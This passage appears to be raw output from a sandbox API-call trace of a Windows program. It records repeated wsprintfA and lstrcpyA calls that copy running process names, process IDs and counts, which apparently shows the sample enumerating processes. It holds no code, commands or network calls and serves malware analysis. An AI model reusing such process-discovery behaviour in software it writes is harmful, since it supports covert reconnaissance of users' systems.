param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.409] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.409] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.409] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.410] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="840") returned 3 [0158.410] lstrcpyA (in: lpString1=0x431000, lpString2="840" | out: lpString1="840") returned="840" [0158.410] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="3307448") returned 7 [0158.410] lstrcpyA (in: lpString1=0x3405e8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.410] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.410] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.410] lstrcpyA (in: lpString1=0x431400, lpString2="lsm.exe" | out: lpString1="lsm.exe") returned="lsm.exe" [0158.410] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="-1") returned 2 [0158.410] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="3308272") returned 7 [0158.410] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.410] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.410] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="8") returned 1 [0158.410] lstrcpyA (in: lpString1=0x430000, lpString2="8" | out: lpString1="8") returned="8" [0158.410] lstrcpyA (in: lpString1=0x33e508, lpString2="3308288" | out: lpString1="3308288") returned="3308288" [0158.410] lstrcpyA (in: lpString1=0x431800, lpString2="600" | out: lpString1="600") returned="600" [0158.410] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.410] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="3309176") returned 7 [0158.410] lstrcpyA (in: lpString1=0x430800, lpString2="3309176" | out: lpString1="3309176") returned="3309176" [0158.410] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.410] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.411] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.411] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.411] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.411] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.411] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="912") returned 3 [0158.411] lstrcpyA (in: lpString1=0x431000, lpString2="912" | out: lpString1="912") returned="912" [0158.411] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="3308288") returned 7 [0158.411] lstrcpyA (in: lpString1=0x3401e0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.411] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.411] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.411] lstrcpyA (in: lpString1=0x431400, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0158.411] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="-1") returned 2 [0158.411] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="3309176") returned 7 [0158.411] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.411] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="0") returned 1 [0158.411] wsprintfA (in: param_1=0x33fdd8, param_2="%d" | out: param_1="12") returned 2 [0158.411] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.411] lstrcpyA (in: lpString1=0x33e508, lpString2="3309200" | out: lpString1="3309200") returned="3309200" [0158.411] lstrcpyA (in: lpString1=0x431800, lpString2="664" | out: lpString1="664") returned="664" [0158.411] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.411] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="3309896") returned 7 [0158.411] lstrcpyA (in: lpString1=0x430800, lpString2="3309896" | out: lpString1="3309896") returned="3309896" [0158.411] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.411] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.411] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.411] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.411] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.411] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.411] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="720") returned 3 [0158.411] lstrcpyA (in: lpString1=0x431000, lpString2="720" | out: lpString1="720") returned="720" [0158.411] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="3309200") returned 7 [0158.412] lstrcpyA (in: lpString1=0x33fdd8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.412] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.412] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.412] lstrcpyA (in: lpString1=0x431400, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0158.412] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="-1") returned 2 [0158.412] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="3309896") returned 7 [0158.412] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.412] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.412] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="12") returned 2 [0158.412] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.412] lstrcpyA (in: lpString1=0x33e508, lpString2="3309920" | out: lpString1="3309920") returned="3309920" [0158.412] lstrcpyA (in: lpString1=0x431800, lpString2="716" | out: lpString1="716") returned="716" [0158.412] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.412] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="3311512") returned 7 [0158.412] lstrcpyA (in: lpString1=0x430800, lpString2="3311512" | out: lpString1="3311512") returned="3311512" [0158.412] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.412] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.412] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.412] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.412] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.412] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.412] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="1616") returned 4 [0158.412] lstrcpyA (in: lpString1=0x431000, lpString2="1616" | out: lpString1="1616") returned="1616" [0158.412] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="3309920") returned 7 [0158.412] lstrcpyA (in: lpString1=0x341200, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.412] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.412] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.412] lstrcpyA (in: lpString1=0x431400, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0158.413] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="-1") returned 2 [0158.413] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="3311512") returned 7 [0158.413] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.413] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0158.413] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="12") returned 2 [0158.413] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.413] lstrcpyA (in: lpString1=0x33e508, lpString2="3311536" | out: lpString1="3311536") returned="3311536" [0158.413] lstrcpyA (in: lpString1=0x431800, lpString2="828" | out: lpString1="828") returned="828" [0158.413] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.413] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="3313000") returned 7 [0158.413] lstrcpyA (in: lpString1=0x430800, lpString2="3313000" | out: lpString1="3313000") returned="3313000" [0158.413] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.413] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.413] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.413] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.413] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.413] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.413] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1488") returned 4 [0158.413] lstrcpyA (in: lpString1=0x431000, lpString2="1488" | out: lpString1="1488") returned="1488" [0158.413] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="3311536") returned 7 [0158.413] lstrcpyA (in: lpString1=0x3409f0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.413] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.413] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.413] lstrcpyA (in: lpString1=0x431400, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0158.413] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="-1") returned 2 [0158.413] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="3313000") returned 7 [0158.413] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.413] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.413] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="12") returned 2 [0158.413] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.414] lstrcpyA (in: lpString1=0x33e508, lpString2="3313024" | out: lpString1="3313024") returned="3313024" [0158.414] lstrcpyA (in: lpString1=0x431800, lpString2="872" | out: lpString1="872") returned="872" [0158.414] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.414] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="3315192") returned 7 [0158.414] lstrcpyA (in: lpString1=0x430800, lpString2="3315192" | out: lpString1="3315192") returned="3315192" [0158.414] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.414] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.414] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.414] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.414] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.414] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.414] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="2192") returned 4 [0158.414] lstrcpyA (in: lpString1=0x431000, lpString2="2192" | out: lpString1="2192") returned="2192" [0158.414] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="3313024") returned 7 [0158.414] lstrcpyA (in: lpString1=0x33f5c8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.414] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.414] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.414] lstrcpyA (in: lpString1=0x431400, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0158.414] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="-1") returned 2 [0158.414] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.414] lstrcpyA (in: lpString1=0x33e508, lpString2="3315216" | out: lpString1="3315216") returned="3315216" [0158.414] lstrcpyA (in: lpString1=0x431800, lpString2="932" | out: lpString1="932") returned="932" [0158.415] lstrcpyA (in: lpString1=0x430800, lpString2="3315848" | out: lpString1="3315848") returned="3315848" [0158.415] lstrcpyA (in: lpString1=0x431000, lpString2="656" | out: lpString1="656") returned="656" [0158.415] lstrcpyA (in: lpString1=0x340df8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.415] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.415] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.415] lstrcpyA (in: lpString1=0x431400, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0158.415] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.415] lstrcpyA (in: lpString1=0x33e508, lpString2="3315872" | out: lpString1="3315872") returned="3315872" [0158.415] lstrcpyA (in: lpString1=0x431800, lpString2="1008" | out: lpString1="1008") returned="1008" [0158.415] lstrcpyA (in: lpString1=0x430800, lpString2="3316952" | out: lpString1="3316952") returned="3316952" [0158.415] lstrcpyA (in: lpString1=0x431000, lpString2="1104" | out: lpString1="1104") returned="1104" [0158.415] lstrcpyA (in: lpString1=0x3405e8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.415] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.415] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.415] lstrcpyA (in: lpString1=0x431400, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0158.415] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.416] lstrcpyA (in: lpString1=0x33e508, lpString2="3316976" | out: lpString1="3316976") returned="3316976" [0158.416] lstrcpyA (in: lpString1=0x431800, lpString2="536" | out: lpString1="536") returned="536" [0158.416] lstrcpyA (in: lpString1=0x430800, lpString2="3318184" | out: lpString1="3318184") returned="3318184" [0158.416] lstrcpyA (in: lpString1=0x431000, lpString2="1232" | out: lpString1="1232") returned="1232" [0158.416] lstrcpyA (in: lpString1=0x3401e0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.416] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.416] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.416] lstrcpyA (in: lpString1=0x431400, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0158.416] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.416] lstrcpyA (in: lpString1=0x33e508, lpString2="3318208" | out: lpString1="3318208") returned="3318208" [0158.416] lstrcpyA (in: lpString1=0x431800, lpString2="1040" | out: lpString1="1040") returned="1040" [0158.416] lstrcpyA (in: lpString1=0x430800, lpString2="3319224" | out: lpString1="3319224") returned="3319224" [0158.416] lstrcpyA (in: lpString1=0x431000, lpString2="1040" | out: lpString1="1040") returned="1040" [0158.416] lstrcpyA (in: lpString1=0x33fdd8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.416] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.416] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.417] lstrcpyA (in: lpString1=0x431400, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0158.417] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.417] lstrcpyA (in: lpString1=0x33e508, lpString2="3319248" | out: lpString1="3319248") returned="3319248" [0158.417] lstrcpyA (in: lpString1=0x431800, lpString2="1068" | out: lpString1="1068") returned="1068" [0158.417] lstrcpyA (in: lpString1=0x430800, lpString2="3320712" | out: lpString1="3320712") returned="3320712" [0158.417] lstrcpyA (in: lpString1=0x431000, lpString2="1488" | out: lpString1="1488") returned="1488" [0158.417] lstrcpyA (in: lpString1=0x341200, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.417] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.417] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.417] lstrcpyA (in: lpString1=0x431400, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0158.417] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.417] lstrcpyA (in: lpString1=0x33e508, lpString2="3320736" | out: lpString1="3320736") returned="3320736" [0158.417] lstrcpyA (in: lpString1=0x431800, lpString2="1564" | out: lpString1="1564") returned="1564" [0158.417] lstrcpyA (in: lpString1=0x430800, lpString2="3321560" | out: lpString1="3321560") returned="3321560" [0158.417] lstrcpyA (in: lpString1=0x431000, lpString2="856" | out: lpString1="856") returned="856" [0158.417] lstrcpyA (in: lpString1=0x3409f0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.418] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.418] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.418] lstrcpyA (in: lpString1=0x431400, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0158.418] lstrcpyA (in: lpString1=0x430000, lpString2="13" | out: lpString1="13") returned="13" [0158.418] lstrcpyA (in: lpString1=0x33e508, lpString2="3321592" | out: lpString1="3321592") returned="3321592" [0158.418] lstrcpyA (in: lpString1=0x431800, lpString2="1632" | out: lpString1="1632") returned="1632" [0158.418] lstrcpyA (in: lpString1=0x430800, lpString2="3322096" | out: lpString1="3322096") returned="3322096" [0158.418] lstrcpyA (in: lpString1=0x431000, lpString2="528" | out: lpString1="528") returned="528" [0158.418] lstrcpyA (in: lpString1=0x33f5c8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.418] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.418] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.418] lstrcpyA (in: lpString1=0x431400, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0158.418] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.418] lstrcpyA (in: lpString1=0x33e508, lpString2="3322120" | out: lpString1="3322120") returned="3322120" [0158.418] lstrcpyA (in: lpString1=0x431800, lpString2="1648" | out: lpString1="1648") returned="1648" [0158.418] lstrcpyA (in: lpString1=0x430800, lpString2="3322688" | out: lpString1="3322688") returned="3322688" [0158.418] lstrcpyA (in: lpString1=0x431000, lpString2="584" | out: lpString1="584") returned="584" [0158.419] lstrcpyA (in: lpString1=0x340df8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.419] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.419] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.419] lstrcpyA (in: lpString1=0x431400, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0158.419] lstrcpyA (in: lpString1=0x430000, lpString2="8" | out: lpString1="8") returned="8" [0158.419] lstrcpyA (in: lpString1=0x33e508, lpString2="3322704" | out: lpString1="3322704") returned="3322704" [0158.419] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.419] lstrcpyA (in: lpString1=0x430800, lpString2="3324808" | out: lpString1="3324808") returned="3324808" [0158.419] lstrcpyA (in: lpString1=0x431000, lpString2="2136" | out: lpString1="2136") returned="2136" [0158.419] lstrcpyA (in: lpString1=0x3405e8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.419] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.419] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.419] lstrcpyA (in: lpString1=0x431400, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0158.419] lstrcpyA (in: lpString1=0x430000, lpString2="13" | out: lpString1="13") returned="13" [0158.419] lstrcpyA (in: lpString1=0x33e508, lpString2="3324840" | out: lpString1="3324840") returned="3324840" [0158.419] lstrcpyA (in: lpString1=0x431800, lpString2="1748" | out: lpString1="1748") returned="1748" [0158.420] lstrcpyA (in: lpString1=0x430800, lpString2="3325344" | out: lpString1="3325344") returned="3325344" [0158.420] lstrcpyA (in: lpString1=0x431000, lpString2="528" | out: lpString1="528") returned="528" [0158.420] lstrcpyA (in: lpString1=0x3401e0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.420] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.420] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.420] lstrcpyA (in: lpString1=0x431400, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0158.420] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.420] lstrcpyA (in: lpString1=0x33e508, lpString2="3325368" | out: lpString1="3325368") returned="3325368" [0158.420] lstrcpyA (in: lpString1=0x431800, lpString2="1192" | out: lpString1="1192") returned="1192" [0158.420] lstrcpyA (in: lpString1=0x430800, lpString2="3326832" | out: lpString1="3326832") returned="3326832" [0158.420] lstrcpyA (in: lpString1=0x431000, lpString2="1488" | out: lpString1="1488") returned="1488" [0158.420] lstrcpyA (in: lpString1=0x33fdd8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.420] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.420] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.420] lstrcpyA (in: lpString1=0x431400, lpString2="MSOSYNC.EXE" | out: lpString1="MSOSYNC.EXE") returned="MSOSYNC.EXE" [0158.421] lstrcpyA (in: lpString1=0x430000, lpString2="12" | out: lpString1="12") returned="12" [0158.421] lstrcpyA (in: lpString1=0x33e508, lpString2="3326856" | out: lpString1="3326856") returned="3326856" [0158.421] lstrcpyA (in: lpString1=0x431800, lpString2="1612" | out: lpString1="1612") returned="1612" [0158.421] lstrcpyA (in: lpString1=0x430800, lpString2="3327680" | out: lpString1="3327680") returned="3327680" [0158.421] lstrcpyA (in: lpString1=0x431000, lpString2="856" | out: lpString1="856") returned="856" [0158.421] lstrcpyA (in: lpString1=0x341200, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.421] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.421] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.421] lstrcpyA (in: lpString1=0x431400, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0158.421] lstrcpyA (in: lpString1=0x430000, lpString2="13" | out: lpString1="13") returned="13" [0158.421] lstrcpyA (in: lpString1=0x33e508, lpString2="3327712" | out: lpString1="3327712") returned="3327712" [0158.421] lstrcpyA (in: lpString1=0x431800, lpString2="684" | out: lpString1="684") returned="684" [0158.421] lstrcpyA (in: lpString1=0x430800, lpString2="3328024" | out: lpString1="3328024") returned="3328024" [0158.421] lstrcpyA (in: lpString1=0x431000, lpString2="360" | out: lpString1="360") returned="360" [0158.421] lstrcpyA (in: lpString1=0x3409f0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.421] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.421] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.422] lstrcpyA (in: lpString1=0x431400, lpString2="calls ccd copyright.exe" | out: lpString1="calls ccd copyright.exe") returned="calls ccd copyright.exe" [0158.422] lstrcpyA (in: lpString1=0x430000, lpString2="24" | out: lpString1="24") returned="24" [0158.422] lstrcpyA (in: lpString1=0x33e508, lpString2="3328072" | out: lpString1="3328072") returned="3328072" [0158.422] lstrcpyA (in: lpString1=0x431800, lpString2="528" | out: lpString1="528") returned="528" [0158.422] lstrcpyA (in: lpString1=0x430800, lpString2="3328384" | out: lpString1="3328384") returned="3328384" [0158.422] lstrcpyA (in: lpString1=0x431000, lpString2="328" | out: lpString1="328") returned="328" [0158.422] lstrcpyA (in: lpString1=0x33f5c8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.422] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.422] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.422] lstrcpyA (in: lpString1=0x431400, lpString2="tri.exe" | out: lpString1="tri.exe") returned="tri.exe" [0158.422] lstrcpyA (in: lpString1=0x430000, lpString2="8" | out: lpString1="8") returned="8" [0158.422] lstrcpyA (in: lpString1=0x33e508, lpString2="3328400" | out: lpString1="3328400") returned="3328400" [0158.422] lstrcpyA (in: lpString1=0x431800, lpString2="1852" | out: lpString1="1852") returned="1852" [0158.422] lstrcpyA (in: lpString1=0x430800, lpString2="3328712" | out: lpString1="3328712") returned="3328712" [0158.422] lstrcpyA (in: lpString1=0x431000, lpString2="352" | out: lpString1="352") returned="352" [0158.423] lstrcpyA (in: lpString1=0x340df8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.423] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.423] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.423] lstrcpyA (in: lpString1=0x431400, lpString2="navigation-jay.exe" | out: lpString1="navigation-jay.exe") returned="navigation-jay.exe" [0158.423] lstrcpyA (in: lpString1=0x430000, lpString2="19" | out: lpString1="19") returned="19" [0158.423] lstrcpyA (in: lpString1=0x33e508, lpString2="3328752" | out: lpString1="3328752") returned="3328752" [0158.423] lstrcpyA (in: lpString1=0x431800, lpString2="1428" | out: lpString1="1428") returned="1428" [0158.423] lstrcpyA (in: lpString1=0x430800, lpString2="3329064" | out: lpString1="3329064") returned="3329064" [0158.423] lstrcpyA (in: lpString1=0x431000, lpString2="360" | out: lpString1="360") returned="360" [0158.423] lstrcpyA (in: lpString1=0x3405e8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.423] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.423] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.423] lstrcpyA (in: lpString1=0x431400, lpString2="chevrolet-play-mel.exe" | out: lpString1="chevrolet-play-mel.exe") returned="chevrolet-play-mel.exe" 